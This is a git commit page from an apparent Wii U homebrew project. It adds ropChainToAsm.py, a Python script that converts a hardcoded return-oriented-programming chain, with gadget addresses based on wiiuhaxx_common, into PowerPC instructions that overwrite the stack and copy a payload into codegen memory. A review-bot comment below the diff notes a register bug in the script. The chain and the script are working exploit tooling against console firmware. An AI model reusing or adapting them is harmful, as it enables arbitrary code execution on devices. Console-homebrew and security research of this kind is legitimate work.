jam1garner 1 year ago
parent
commit
906b93b0f0

build_codeloader.bat → miniloader/build_codeloader.bat View File


codeloader.bin → miniloader/codeloader.bin View File


codeloader.o → miniloader/codeloader.o View File


codeloader.s → miniloader/codeloader.s View File


+ 40
- 0
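--- a/miniloader/ropChainToAsm.py
+++ b/miniloader/ropChainToAsm.py
@@ -0,0 +1,40 @@
+# Assemble rop chain into semi-optimized ppc to write over the stack
+# ROP chain based on yellows8's wiiuhaxx_common for loading into codegen
+# FFFF2222 is a stand in for the payload load address (stored in r7)
+# FFFF3333 is a stand in for the payload size (stored in r11)
+# place at "found:" in codeloader.s
+
+
+#This ROP chain was created using:
+# ropgen_copycodebin_to_codegen(0x01800000, 0xFFFF2222, 0xFFFF3333)
+# ropchain_appendu32(0x01800000)
+# in ropchainBuilder.html
+ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
+ropChainAddresses = []
+for i in ropChain:
+    if not i in ropChainAddresses:
+        ropChainAddresses.append(i)
+
+# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
+# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size
+writeRegister = ''
+for address in ropChainAddresses:
+    if address == 'FFFF2222':
+        writeRegister = 'r7'
+    elif address == 'FFFF3333':
+        writeRegister = 'r11'
+    elif address[:4] == '0000':
+        print('li r10, 0x'+address[4:])
+        writeRegister = 'r10'
+    else:
+        print('lis r10, 0x'+address[:4])
+        if address[4:] != "0000":
+            print('ori r10, r10, 0x'+address[4:])
+
+    last = ropChain.index(address)
+    while last != -1:
+        print('stw %s, 0x%X(r1)' % (writeRegister, last * 4))
+        try:
+            last = ropChain.index(address, last+1)
+        except ValueError:
+            last = -1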
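Review bot: The `else` branch that emits `lis r10`/`ori r10` never resets `writeRegister`, so the `stw` loop below keeps whatever register the previous iteration selected; since `ropChainAddresses` preserves first-occurrence order, the entries right after 'FFFF3333' (e.g. '01035FC8', '01800000') would be stored from r11 rather than the r10 just loaded. Adding `writeRegister = 'r10'` as the first line of that branch makes the emitted store consistent with the load, and it is then clearer to drop the empty-string initialisation. The `index`/`ValueError` loop can be written as `for pos, value in enumerate(ropChain): if value == address: print('stw %s, 0x%X(r1)' % (writeRegister, pos * 4))`, which reads more directly. Minor: `if not i in ropChainAddresses` is conventionally spelled `if i not in ropChainAddresses`.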

ropchainBuilder.html → miniloader/ropchainBuilder.html View File